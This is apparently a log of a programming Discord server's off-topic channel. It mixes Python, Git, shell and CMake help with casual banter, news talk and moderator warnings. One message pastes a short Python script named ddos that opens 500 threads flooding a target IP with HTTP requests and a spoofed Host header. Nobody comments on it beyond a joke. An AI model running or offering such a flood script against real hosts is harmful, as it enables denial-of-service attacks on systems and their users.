#ot1-perplexing-regexing
1 messages · Page 554 of 1
Your input was invalid: Message "aaa" not found.
Usage:.bookmark <target_message> [title=Bookmark]
yeah
yeah the advantage is in most CNN's initial layers kind of learn same things, edges mostly, things change in ending layers, tanhts why augmentation works.
Really thanks man , appreciate the information you gave me, thanks
Will watch the videos you've sent
Oh, same, goodbye!
One thing I would suggest is , turn it into a string (tostring) and then select the first 4 elements or something
then turn back to float/double
I said
turn it into a string
then select the elements you want
THEN turn back into float/double
You can do that in technically any language
I don't think Math.round will work, though
I think Math.floor should be the one used instead
@violet mason
(Forgot to tag the person that needs that information 😅)
I had trouble intalling Qtcreator can i dm?
Generally a bad idea to ask for DM support
Kay, wont do 😉
:|
if your using Linux, then idk how the hell your having issues with it. I just installed it with Fedora Linux.
Nah not linux, windows
then obviously i can't help
Is the installation for windows hard?
I quitted windows years ago
idk, i don't use windows 10 for development
Kays, thanks
its better on windows :)
I want to create module for python on rust, is any big int type in rust that can replace int from python?
I don't really know
but
the int in python corresponds to bigint in other langs if that's what you're asking
python ints can be arbitrarily long
how to move widget in layout to the top
a question I will never find myself answering
what is this channel about
LIL NINJA

cool
😐
pt = int(input('Digite o primeiro termo da PA: '))
razao = int(input('Digite a razão da PA: '))
print(pt)
for c in range (1, 11):
if razao >= 1:
print('Essa é uma progressão crescente.')
cresc = (pt + (c * razao))
print(cresc)
if razao == 0:
print('Essa é uma progressão constante.')
const = (pt + (c * razao))
if razao < 0:
print('Essa é uma progressão decrescente.')
decs = (pt + (c * razao))
thanks
@terse bough ?
yeah
maybe he's gothic or something
you need something inside for
jesus im not joking
what can I put inside "for"?
I can't indent this first if, can I?
maybe a variable?
uh, I need to get the first 10 numbers in a arithmetic progression
means you want to take inputs 10 times?
so, pt = first term
razao = uh, don't know the world, but it's the multiplier of the AP
so, if razao = 1, and pt = 1
1
2
3
4, if it's a crescent
if razao = -1, it's
1
0
-1
-2
-3
inputs? Wouldn't it be outputs?
the inputs are the first 2 variables in the beginning
!e
pt = 1
razao = 1
print(pt)
for c in range (1, 11):
if razao >= 1:
print('Essa é uma progressão crescente.')
cresc = (pt + (c * razao))
print(cresc)
if razao == 0:
print('Essa é uma progressão constante.')
const = (pt + (c * razao))
if razao < 0:
print('Essa é uma progressão decrescente.')
decs = (pt + (c * razao))
@rough sapphire :white_check_mark: Your eval job has completed with return code 0.
001 | 1
002 | Essa é uma progressão crescente.
003 | 2
004 | Essa é uma progressão crescente.
005 | 3
006 | Essa é uma progressão crescente.
007 | 4
008 | Essa é uma progressão crescente.
009 | 5
010 | Essa é uma progressão crescente.
011 | 6
... (truncated - too many lines)
Full output: https://paste.pythondiscord.com/ewuyidinex.txt?noredirect
what do you mean by this?
1
2
3
4, if it's a crescent
1 = first term
1 + 1 = 2
2 + 1 = 3
3 + 1 = 4
can you explain in english?
Uh, sure
i mean
what are these raza and pt doing and what do you want as output?
This is what I want 🙂
yeah!
@rough sapphire why so aggressive :/
uh...
ah
crescent, constant, descrescent
yes so what are those?
three types of arithmetic progressions?
import threading
import socket
target = "192.168.8.1"
port = 80
fake_ip = "182.21.20.32"
def ddos():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto((f"GET /{target} HTTP/1.1\r\n").encode("ascii"), (target, port))
s.sendto((f"Host: {fake_ip}\r\n\r\n").encode("ascii"), (target, port))
s.close()
for i in range(500):
thread = threading.Thread(target=ddos)
thread.start()
alright so if im not mistaken
cresent means its increasing
dec means decreasing and
0 means consta
pls don't interrupt an active conversation
def ddos() 🤔
who knows what it does
no problem
it's even better
I'll probably try to use eng variables from now on
to help understanding
!e
ini = 2
diff = 2
for i in range(10):
a = ini + i*diff
print(a)
if diff>0:
print('increasing')
elif diff<0:
print('decrease')
else:
print('constant')
@rough sapphire :white_check_mark: Your eval job has completed with return code 0.
001 | 2
002 | 4
003 | 6
004 | 8
005 | 10
006 | 12
007 | 14
008 | 16
009 | 18
010 | 20
011 | increasing
they use (n-1) but we are starting from 0 so its fine.
does that code make sense?
indeed
but the first 2 variables are inputs
you can now make sum thingy by your self
yeaah just change it we can't take inputs here thats why
ah, ok
it won't cause any prob im sure
yeah its all the same, you put same code in all 3 xD
alright any ways
about your for is lonely thing
i meant
for i in range(10):
print('hey') # this is OUTSIDE FOR
so your for can't be empty
it worked wonders, thank you @rough sapphire
The exercise by itself was just to make a AP, but, I've tried to go further, to improve my understanding of loops, ifs...
sure. i'm glad i could help.
🙂
you could also take lets say input n and return what number will be on that place.
just remember this for next time. thats what they meant for indentation.
I just need to put something there before the ifs, right?
means? no
you just can't have empty if condition or for or anything
!e
if True:
print('im outside')
@rough sapphire :x: Your eval job has completed with return code 1.
001 | File "<string>", line 2
002 | print('im outside')
003 | ^
004 | IndentationError: expected an indented block
!e
if True:
print('im inside')
@rough sapphire :white_check_mark: Your eval job has completed with return code 0.
im inside
How is "InsaneLatch" or "InsaneLock" fot a username
@rough sapphire , yeah, the for was empty because I was trying to indent the if back
but I got it already
the problem
because you were doing if thing outside
yeah, at the same level as for, right?
yeah
so this is what happens when i try to send a file rn
the thing is, the "pictures", "videos", and stuff aren't there as i use onedrive for my files & stuff
so they aren't the default directories
anyone know how to add this stuff to the file picker?
bruh
thats oesophagus then not piehole
Hey guys, how large is LLVM?
Bigly large
hi
ih
I love what this guy and what he does in general and this project with Python and AI he is genius
It's Kitboga
The scambaiter?
ye
He worked with a developer fan and made a ai that does scambaits
(bigly large) gb
ah yes, so much more descriptive
I checked, and I got a range from 30-188 gb
A bunch of different answers
And I'm not sure which is correct
Install it and check

is my favorite emoji
What repo is that?
.gh repo run1e/acebot
i'm about to make another pr as well
nice
hm
if USE_GAME_MODEL:
import numpy as np
log.info('Importing keras...')
from tensorflow import keras
log.info('Finished importing keras.')
else:
log.info('keras.model has not been loaded.')
```vs```py
if USE_GAME_MODEL:
np = __import__('numpy')
log.info('Importing keras...')
keras = __import__('tensorflow.keras')
log.info('Finished importing keras.')
else:
log.info('keras.model has not been loaded.')
which one is a better way to have a conditional import only if an env var is True?
i like first one
Lmao
the issue is pylance complains about unresolved imports
you can use #noqa
#noqa what tho
huh
oh, for a type checker, the comment is # type: ignore
from airflow import DAG # type: ignore
# pyright: reportMissingImports=false would work as a blanked disable
ugh
would that work on pycharm as well?
it should
let me test
yup, works
it is part of the type checker PEP after all
good
very good
Why do you make so many PRs to that repo?
@rough sapphire how did you configure commit signing?
sorry mark
er
@cerulean basin
"Unverified"
function condoms hmmmmm
Have you set up gpg?
Already
Follow instruction by GitHub
I kept following guides but nope
and use Linux
Nice
Could you relink it
You can sign your work locally using GPG or S/MIME. GitHub will verify these signatures so other people will know that your commits come from a trusted source. GitHub will automatically sign commits you make using the GitHub web interface.
I might need a new key tbh
I don't remember. I set it up years ago and haven't touched it since.
wwhat ide do you use?
PyCharm mainly
ah
i did that tho!
idk
hello
i'm still totally lost 😓
@jaunty blade please don't spam the same thing in all the off-topic channels
finally, discord noticed
fwiw sometimes, when that's occuring, that just happens
the multiple channels thing no
but multiple times, yes
i uh, was apparently sending images 8 times today
Er... just install a GPG agent, generate a key, and then configure git to use that key and agent.
That doesn't sound too old, unless you're implying that version had a bug
i had to upgrade it previously because stuff didn't work
i don't know how it ended up this old again 🤔
Anyway, I don't remember much except that it wasn't much trouble for me. I'm probably not the best person to help you with this.
fwiw i did it on a different computer and it
just worked.
what is happennig to discord?
can someone help me with this?
eivl is singlehandedly carrying pygen
lol
every editor has that bro
ye
hmm
VSCode + WSL
o
ye
cant go back now
still need to learn macros
oh ben awad has a video on it
great
use nvim 🙃
ban
blocked
LOL it took me a second to realize 75% of that was your username, but until then, I was like.. "I don't understand the association between C# and vim here..." LOL
otn a 75% username 😔
Lmao
...with?
@gloomy spindle
OMG my fav sporting event suspended
IPL 2021 LIVE News Updates: Having hit hard by the COVID-19 pandemic, the Indian Premier League (IPL) 2021 has been postponed indefinitely on Tuesday. The decision ends a month-long relatively smooth run for cricket’s most glamorous event.
The announcement came after Sunrisers Hyderabad’s wicketkeeper-batsman Wriddhiman Saha tested positive for COVID-19 along with Delhi Capitals’ veteran spinner Amit Mishra. Earlier on Monday, Chennai Super Kings bowling coach L Balaji along with Kolkata Knight Riders bowlers Sandeep Warrier and Varun Chakravarthy had also returned positive results.
yessssssssss

haskell is function condoms
@cerulean basin 😄
Noice
i was actually going to ask you for help next lol
after looking at the repo and noticing you had configured it as well
Yep
wanna know the solution
if [[ -n "$SSH_CONNECTION" ]] ;then
export PINENTRY_USER_DATA="USE_CURSES=1"
fi
in my bash_profile
i honestly should just always do that
i love cli
about fucking time
bruh
#Neymar gets the red card in the 90th minute and so does Tiago Djaló
#PSG #Ligue1
Catch the latest highlights of LaLiga🇪🇸, Ligue 1🇫🇷, Turkish Süper Lig🇹🇷,
Copa Libertadores🏆, Copa Sudamericana🥇 on our YouTube channel.
Follow the latest news on beINSPORTS.com and stream all their games on our app beIN SPORTS CONNECT.
Download beIN SPORTS CONNEC...
my god I can't
if he does this in the second leg of the CL i'm gonna die laughing
nooo video removed
mine?
I can't with Neymar and diving
he's such a talented player
if he focused on finishing goals and staying on his feet
Chinese vaccines are not helping India
cuz they cant enter india 
is that true?
lemme fact check
right
I think we were going to war w China too
at one point
that cooled down
Modi is terrible
😬
dude is so afraid of losing his power so he won't do lockdowns

also there's no cap on the amount of terms a prime minister can stay
so as long as sufficient people vote for him he could stay for years
i mean there is lockdown
nope
ah sad
i had a really good vid lol
yes
people still believe in him
so
I wonder how COVID is affecting the Uyghur Muslims China is holding captive
kissasses heh
Biden calls the Armenian genocide a genocide
but he refuses to comment on the genocide China is currently committing
I think he's afraid
the UK lawmakers called it genocide
so.......................
maybe, maybe not
bjp has internal rules
once modi is over 75 he cannot be bjp's leader any more
unless they change their rules
which isn't unreasonable either
thing is, modi put that rule to remove older leaders lol
and he can remove it for himself
so
oh I didn't know
yeah
👀
"after"?
ahhhhhh
dead poet's society is good
ahh, modi just wants to convert india to china pt.2
his progress is looking good so far 👀
😬
Function condoms are good, they prevent you from creating new methods!
Was a joke lel
yeah i got it
my bad, i literally googled to see if there is something like that in coding
then i realised
Lol
how do i run lua script in vsc terminal
Same way you run it from any other terminal
cult
How do I put the text on the same line:
<h1>
<p style="text-align:center;
font-family:Georgia;
font-size:50px;
color:#CC0000">Big Hero 6</p>
<p style="text-align:right">2015</p>
</h1>
I am new to html so please help
p is paragraph, if you want inline styling, use span
I told you the answer in #web-development
Or use css with display: flex;
beginner bro
True
ye
True
oh good ole logs lol...
I believe the left hand side simplifies to x since the logbase10 would be the inverse to the exponential 10**x
Desmos? Lmao
use log rules
its log10(7) / 1
or x = log10(7)
cuz u can pull the exp out into a multiplicative for a log
you should get good at these btw they're a big deal particularly for asymptotic notation stuff you'll do eventually if you study cs
Yes
I know the answer
yes, but for the specific question of what does the left side simply to, the answer is x
But they literally gave you it
yes, I guess you can say that about all math problems in some capacity lol, ... ugh I used to love math much more than I can remember now lol
wrong
there are two steps
or three to four i suppose if you wanna be really specific
pull out x, eval log10(10)
either see its 1 or divide both sides by log10(10)
so 3-4 steps
they were just showing you a rule
none of the questions you'll have in these classes are hard
stop acting so pompous
there is an extremely clear and obvious purpose to the question
you're in what is either a high school or remedial math course and they are giving you questions to test your knowledge of logs, they do not literally give you the answer at all
What kind of rule is it that you can replace one number with another number that's equivalent
That's not a rule, that's common sense
most of algebra is common sense kid
It shows the log_a(a^x)=x rule
it just operates on axioms
they're showing you an axiom
stop acting smart
hurr im gonna post to a programming discord about how smart i am cuz my class tried to illustrate a rule of exponents
stop
you're not cool
no one will like you more for it
you just look like an idiot because no one is impressed by this
you have literally lost social standing as a result of attempting to gain some by trying to look smart
STOP
this is why you have no friends
I wasn't trying to be cool for gods sake
They literally didn't explain anything
And posted some question that wasn't complicated
he deleted it lol
!warn @rough sapphire please keep our code of conduct in mind. It is by no means acceptable to mock people.
:incoming_envelope: :ok_hand: applied warning to @rough sapphire.
lmao
whoah
I see you everywhere in this server! but you are just a normal role??? that seems weird
haha
I swore I thought you were a mod
Nah, I wasn't
haha
@rugged echo my tips for getting people involved and to contribute:
a) Make it easy and straight forward to get help, like as easy as possible
b) Keep the ask simple and, if possible, fun
c) Make it more of a collaborative thing than just offloading work
So for the topic ask, don't even have them comment in the PR/issue. Collect the responses yourselves. Make it more like a conversation than like work the other person has to do.
For this, it also helps to give a few examples of what you're thinking of to get the ball rolling. Help other people get an idea of what kind of questions/answers you're looking for
so i need to simply turn it into a conversation, and give some examples as to what the format should be. correct?
thanks a lot btw, you're helping me learn tons of stuff
mhm, that's generally what's worked for me to get people to contribute to this kind of stuff
alright, i'll definitely do that tomorrow! the server isn't particularly active currently so i don't think it'll be effective currently
get people talking about stuff they already like talking about
"what are good trivia questions for python / rust / other languages / linux"
haha yeah, hitting peak active time also helps
right!
ok. also, i don't want it to look spammy but still would like some results. would you recommend a nice regular time interval i can kinda inject into the convo and ask?
like every 30 mins or smth lol
So I would try to naturally guide it into the conversation. Like if there's a lull bring it up or if you think the conversation is headed in a similar direction
ahhhh ok
for the time being, our team is just gonna keep on making up questions lol
thank you!
no worries~ maybe I'll have time to contribute questions tomorrow or Thursday
yes!!!! do you think the current questions seem good?
we brainstormed a lot lol
trying to touch every subcategory
can anyone help me with this?
Is the OneDrive folder in Home?
yeah
Is there a way to do exe to py?
exe to py or py to exe?
exe to py would be decompiling and, well, we don't do reverse-engineering stuff here
exe to py has "sketchy" written all over it
Yea
plagiarism
py to exe easy with console but how to do that in reverse
As I said, this is decompiling and reverse engineering, which is against rule 5 here - it is prohibited by most ToS, and even if your usecase allows it, it can be easily used for those prohibited stuff
oh ok
Then I have other question
How to send message via weebhook using Python?
weebhook? I wish haha
how
Anyone wanna make a TikTok Compilation Youtube account with me?
no
no
no
how you want to do that?
dm me
google it
i never used input in dart
no, you can only physically read lines synchronously.
@mellow spire
uh?
is there a way to have an audio file be a certain hertz using ffmpeg?
extension count
i was afk and said i would send it when i got on pc
9 of those extensions are themes LOL
does anyone know how i can git clone a Qt Example repository into my system? something like this https://code.qt.io/cgit/qt/qtmultimedia.git/tree/examples/multimedia/audiorecorder?h=5.15
simply doing git clone https://code.qt.io... or git clone git://code.qt.io/... won't work
or is there a server for this kind of stuff
You have to clone the git url
try git clone https://code.qt.io/cgit/qt/qtmultimedia.git, i think you need a .git at the end iirc
ok thx, that's sorta working. let's see
i think its temporary
this worked perfectly. though it took a long time and downloaded the whole thing lol
anyways, thank you very much!
indeed
smallest computer....what are the specs? 😛
Better than you think
rtx 3090 5900x
there could be hundreds of transistors al least
memes not relevant to the discussion shouldn't be shared in server, I guess you missed that
Oh yea, thx for telling
damn
i just learned that @gilded prawn has sent only 2 messages in this channel ever
send-pack: unexpected disconnect while reading sideband packet
fatal: the remote end hung up unexpectedly
Everything up-to-date
ohok my internet went poof
fatal: unable to access 'https://github.com/AnkithAbhayan/AnkithAbhayan.github.io/': OpenSSL SSL_connect: Connection was reset in connection to github.com:443
!e ```py
🐈 = 10
print(🐈)
@low chasm :x: Your eval job has completed with return code 1.
001 | File "<string>", line 1
002 | 🐈 = 10
003 | ^
004 | SyntaxError: invalid character '🐈' (U+1F408)
You are not allowed to use that command here. Please use the #bot-commands channel instead.
c'mon
that's too much of a hassle
i want like a shortcut
1-click and i go to my pictures folder
is it a good idea to use the same gpg key for all of my commits or should i have a different gpg key on each of my servers?
Isn't the point of signing commits so that you can tell who created them?
well you can
but like
just was wondering
yeah probably should be the same
welp gotta figure out how to export the private key and import it elsewhere
I guess it's just a question of what the consequences would be? I mean if you're developing for a furry porn website and you don't want that associated with your main github or something
oh you mean a different signing key on each of your devices from which you push?
yes
ah ok, I thought you were talking about pushing to many servers from a single device
in that case yeah, I think it's considered best practice to use a different private key
the idea being that if the private key is ever copied, that's more of a possibility for it to be leaked
especially if you're transmitting it over a network
but even if you're just using sneakernet, you could lose your flash drive or whatever
although fwiw I don't use gpg to sign my git commits, I'm talking about SSH keys here
but I think in theory the same principle applies
can anyone help me with this?
np
@vast wedge I think due to Keychains and such and them being different from gpg the same key should be used for the same projects.
If the person and machine and project such are all the same then imo same key as well
@low chasm You aren't in the Rust Discord? I'm surprised.
I am
I'm in the Discord
huh
And it doesn't show Rust as a mutual
which one?
The verified one
.gg/rust
this one?
No
huh
The official one
s
LMAO
I thought that had something to do with Rust…
This is the largest rust discord
Crap
can anyone help me with this?
(someone said duel boot for context)
no
its actually a duel between 1 to 13
the winner of the duel is that specific line's indent
🖕
noshit i'm pissed off
btw zsh is ohmygod so great
I don't actually use 3
@latent scaffold ...
.
uh oh
no
It's useless and slow
Just install powerlevel10k and some zsh plugins, it's much better
hmmm
soon
:zoomeyes:
looks gr8 don't it
yessss
eh
fwiw i used it since i haven't set up a system to sync dotfiles yet
so eventually i'll get to using other thigns
since i don't really want to have to make manual edits to much
mfw the only dotfile i have edited is .env
lol
i had to edit so much for bash
that as of now
I actually am running bash and then typing exec zsh -l LOL
which imo is a good way to not fuck up terminal access
init.vim :(
bruh how
how does terminal completion work?
what terminal clients support terminal completition?
also is it supported over ssh?
Zsh has autocomplete
And all terminal clients support it
You just have to install it
Zsh is great
i want to double check
Hm
Well, all terminals support it
At least the majority
The shell has to be the thing providing it
oh i meant one that does the greyed out stuff
like what @carmine niche once showed
yes
i have been summoned
i currently have zsh
ur terminal
Better autocomplete than many other shells out there imo
zsh already has autocomplete u just need to set it up
think there's a built-in setup script
no ur shell does that gray out thing
Huh
my guy that is what i am talking about
zsh already had that, don't switch
okay yeah
can you tell me what terminal client you use?
this is related to the fact that i was having earlier issues with my terminal
Alacrity ftw
there's tab autocomplete even in cmd lol
holy shit
I need help with a part of my program so basicly you have the user enter two string and it does diffrent stuff with those string. Where i need help is with this one part so you need to see what the first letter of the string is i got that down but then you need to compare them and see what string comes first in the alphabet
for example
Enter string # 1: apples
Enter string # 2: bananas
The first character of apples is: a
The first character of bananas is: b
apples comes before bananas
this is what it should look like i just don't know how to compare the strings
THIS IS IN JAVA
BTW
comparing chars is simply x > y
for comparing strings use x.compareTo(y)
ye
doubtable dart
get some help
imagine using dart tho
4 spaces ftw
heh marking a tab as 4 spaces is the way
tab as 8 spaces ftw
Ooh okay this server is much bigger than I thought
new ankith 
wtf
👀
🤔

But async is gud tho
bro just make everything async @last mantle
lol
i have terminal inputs lol
make it async
sad
they are different things
but isnt it running different things at once
used for different purposes
oh i c
ask the pros about async
If something is blocking, maybe run it as a seperate async task or smth
imma yeet
then that means async is useless?
no
thats what im doin
@last mantle why dont u just allow the blocking
create_task
input is extrememly blocking heh
its not like file reading
are u going to take inputs while its downloading somethnig?
no
if he is taking inputs while the window is open
eh in python, it kills the program
why not have blocking
If something blocks in async code, and does not use await, then the whole application gets blocked
the window might freeze no
Because async aint like threading
ye
hah pathetic
wdym udk async lol
hmm that was like just adding async await to everything without knowing what it does
lol
damn
i am comfortable with threading idk when or why ill need async
web stuff
ye
Well, working with discord.py I realised how useful async is
requests
Till then I was threading boi
try to return a value using threading
loil
you can use concurrent.futures
easy
hax
Or play with queues
👋
why use return when you have class variables 
eh?
cuz , apparently, http is async :(
ye but
use https /s
u are not doing any http while its taking input right?
so whats the problem
mark it as async
call
dart can run async code without await
not make
I think there was aiohttp or some module that that for async http
its live javascript
Try aiohttp
dart

Future<void> e() async{}
hmm
oh nvm u need future for async
hmm, I could just reextract the zip.
use streamlabs obs lolol
@twin charm there should be a reset to default button
where?
well there should be
hmmmm
.topic
Haven't a clue
I had a question about the security implications of using http.server in production
There were many warning in the docs, but actually wanted to understand the risk
i just saw it on the discovery page lol
same
and i just learnt how to use for loops
so i wanted to flex a little when i realized
ye
OH MY GOD WHY
What
Look at the reaction
Ugly
It's worse on non OLED optimized mdoe
can anyone help me with this?
agreed
@rich moon https://pastebin.com/gPQyZrnV here it is
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
sorry for double ping
okay so what i did was that glfw and glad had git repositories of the code
i too learning from learnopenglcom
and each git repository contained a cmakelists so essentially i just first built them (glfw, glad) and then i linked them to my main
im still not getting, what i should suppose to do?
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
like this is what it looks like
this is the file structure
so i have to again cmake them?
so cmake has this add_subdirectory which basically will build using the cmakelists.txt in the folder u specify
Person advertising rust in a python server 😹
we're totally not a cult, promise
so essentially the process that the root cmakelists.txt runs is
- build glad from
extern/glad - build glfw from
extern/glfw - build the main and link the built glad and glfw to get final executable @winter heart
If u were id join
the extern folder is just where i decided to keep the third party libraries
it isn't looking easy to me, but i'll try and will tell you the results.
alright. thanks, will tell after trying
if you use git you have to do a git add submodule
here is github link to glfw
https://github.com/glfw/glfw
and the one for glad https://github.com/Dav1dde/glad
got it. Thanks 🙂
TOS moment
@winter heart lmao
so this is what happens when i try to send a file rn
the thing is, the "pictures", "videos", and stuff aren't there as i use onedrive for my files & stuff
so they aren't the default directories
anyone know how to add this stuff to the file picker?
it is (located in /home/OneDrive), but like how do i get it in the file explorer?
U go to /home in the explorer
yeah, but i want a shortcut in the sidebar that can take me right to, say, Pictures
EYYY
LESGO
No
Discord Compact mode ain't bad
It makes me not have to see people's weird pfps sometimes
ayy lessgo
Ayo wheres the cats?
Your display name is too long to be catified! Please change it to be under 26 characters.
.catify
Your catified nickname is: Le_Fishe | ᕂᘏᗢ
How many in the dungeon?
Hm?
?
None?
None what? Lol
You keep your cats in a dungeon or something? Lol
No cats in a dungeon?

